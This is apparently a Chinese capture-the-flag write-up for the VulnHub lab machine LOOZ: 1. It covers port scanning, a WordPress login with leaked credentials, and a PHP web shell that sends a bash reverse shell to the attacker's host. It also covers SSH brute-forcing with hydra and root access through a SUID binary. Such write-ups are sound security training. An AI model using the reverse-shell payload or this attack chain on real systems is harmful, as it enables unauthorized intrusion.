信息收集
开启靶机。
web服务探测
通过nmap扫描,发现靶机IP地址以及对应开启的端口,发现80、22、3306、8081端口开启,先打开80端口的网站,发现源码存在提示。
存在一个账号以及对应的密码。
john:y0uC@n’tbr3akIT。
但经过目录扫描,未发现任何可以利用的页面。
扫描8081端口,发现该端口存在web服务。
但直接使用ip地址:8081无法进入,使用dirsearch目录进行探测,发现是wordpress。
进入/wp-admin/目录,发现需要跳转到http://wp.looz.com/网站,配置/etc/passwd文件域名解析,绑定10.0.2.10靶机ip地址,即可正常跳转。
使用在http://10.0.2.10/web主页源码中提及的john用户登录
登陆成功。
查找shell上传点。
添加file mannager插件。
直接添加文件。
使用phpinfo测试成功。
修改shell中代码,使用bash反弹shell。
<?php system('bash -c "bash -i >& /dev/tcp/10.0.2.15/4444 0>&1"');?>
kali靶机开启4444端口监听。
经过一番探测,发现这是一个docker容器。。。。我裂开。
使用cat指令读取/proc/1/cgroup文件,确认这是一个docker容器。。
ssh爆破
在wordpress网站中发现了一个用户名 gandalf。
由于靶机开启了22端口,而且web服务是运行在docker容器中,就考虑到使用hydra爆破ssh登录靶机。
ssh爆破成功,存在用户gandalf,并且密码是highschoolmusical。
hydra使用的密码字典是kali靶机自带的/usr/share/wordlists/rockyou.txt字典。
提权
登录gandalf用户后,在/home目录下发现存在alatar用户。
先使用linux探针,linpeas.sh。
执行探针,发现存在alatar用户,并且该用户权限比gandalf用户权限更高。
在探针反馈的信息中suid存在/home/alatar/Private/shell_testv1.0 (Unknown SUID binary)。这是一个可疑文件,没错,运行这个文件直接获取到root权限。
获取root权限后,查看下靶机运行的docker服务,我很不爽。。。
没错,确实运行着docker服务,并且是两个。。。
读取下/root目录下的root.txt文本文件。
发现是一串字符,盲猜md5加密,解密后发现是gandalf。。。。
ok,这个靶机到此结束。
参考链接
LOOZ: 1靶机下载地址:https://www.vulnhub.com/entry/looz-1,732/.
如何判断当前linux是 docker容器 还是 虚拟机/物理机:https://blog.csdn.net/mar_ljh/article/details/109011822.
md5解密网站:https://www.somd5.com/.